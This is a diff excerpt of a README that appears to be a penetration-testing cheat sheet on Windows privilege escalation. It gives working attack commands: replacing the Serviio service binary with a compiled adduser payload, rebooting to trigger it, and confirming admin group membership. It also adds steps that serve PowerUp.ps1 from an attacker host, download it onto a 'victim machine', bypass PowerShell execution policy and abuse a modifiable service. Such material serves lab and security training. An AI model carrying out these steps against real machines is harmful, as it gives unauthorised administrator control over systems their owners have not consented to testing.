seeu-inspace/easyg/README.md

      return 0;
    }
    ```
-   - `i686-w64-gcc adduser.c -o adduser.exe`
+   - `i686-w64-gcc adduser.c -o adduser.exe` or `x86_64-w64-mingw32-gcc adduser.c -o adduser.exe` to Cross-Compile the C Code to a 64-bit application
    - `move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"`
    - `move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe"`
    - `dir "C:\Program Files\Serviio\bin\"`
-5. Restart the service, here's two options
+4. Restart the service, here's two options
    - `net stop Serviio`
+   - `Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'Serviio'}` Obtain Startup Type for Serviio service
-   - Check `Startmode` of the service with `wmic service where caption="Serviio" get name, caption, state, startmode`.
-If it's `Auto`, it means that it will restart after a reboot.
+   - Check `Startmode` of the service with `wmic service where caption="Serviio" get name, caption, state, startmode`
+   - If it's `Auto`, it means that it will restart after a reboot.
 Reboot with `shutdown /r /t 0 `.
-6. Check if it worked with `net localgroup Administrators`
+5. Check if it worked with `net localgroup Administrators`

+**PowerUp.ps1**
+1. Check [PowerUp.ps1](https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc) and make it available with `python3 -m http.server 80`
+2. Download it from the victim machine `iwr -uri http://<IP>/PowerUp.ps1 -Outfile PowerUp.ps1`
+3. Run the commands `powershell -ep bypass` and `. .\PowerUp.ps1`
+4. Then run `Get-ModifiableServiceFile` to display services the current user can modify
+5. Run `Install-ServiceBinary -Name 'mysql'`.
+If it throws an error even if you already know that the current user has full access permissions on the service binary, proceed with manual exploitation

 #### <ins>Registry</ins>